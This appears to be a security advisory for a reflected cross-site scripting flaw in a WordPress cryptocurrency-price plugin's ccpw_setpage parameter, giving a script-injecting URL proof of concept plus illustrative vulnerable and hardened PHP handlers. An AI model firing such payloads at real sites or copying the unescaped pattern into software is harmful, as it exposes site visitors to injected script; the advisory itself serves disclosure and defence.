The plugin does not sanitise and escape the ccpw_setpage parameter before outputting it back on pages where its shortcode is embedded, leading to a Reflected Cross-Site Scripting issue.
Append the following URL parameter to a page where the [ccpw_currencies_with_price] shortcode is embedded: ccpw_setpage=1"><script>alert(/XSS/)</script> e.g.: https://example.com/page_with_shortcode/?ccpw_setpage=1"><script>alert(/XSS/)</script>
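The defect and its fix, as an added illustration rather than the plugin's own code: a hypothetical shortcode pager that echoes ccpw_setpage unescaped, beside the hardened form that validates the value as an integer and escapes it for the attribute context (function names are assumptions; absint, wp_unslash, add_query_arg, esc_url and esc_attr are standard WordPress helpers).

```php
<?php
// Hypothetical example handlers, not the plugin's actual code.

// Vulnerable pattern: the raw query parameter lands inside an HTML attribute
// unescaped, so a value containing a double quote closes the attribute and
// anything after it is rendered as markup (the reflected XSS described above).
function ccpw_example_pager_vulnerable() {
    $page = isset( $_GET['ccpw_setpage'] ) ? $_GET['ccpw_setpage'] : '1';
    return '<a href="?ccpw_setpage=' . $page . '" data-page="' . $page . '">Next</a>';
}

// Hardened pattern: coerce the value to what it is meant to be (a positive
// page index) and escape it for the context it is written into on output.
function ccpw_example_pager_safe() {
    $page = isset( $_GET['ccpw_setpage'] )
        ? absint( wp_unslash( $_GET['ccpw_setpage'] ) )
        : 1;
    if ( $page < 1 ) {
        $page = 1;
    }
    // add_query_arg() builds the URL; esc_url() escapes it for href,
    // esc_attr() escapes the value for a plain attribute.
    $url = add_query_arg( 'ccpw_setpage', $page );
    return '<a href="' . esc_url( $url ) . '" data-page="' . esc_attr( $page ) . '">Next</a>';
}
```

With the hardened version, the proof-of-concept value above is reduced to the integer 1 before it is ever written to the page, and any remaining output is attribute-escaped.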
Jeremie Amsellem
Yes
2022-09-14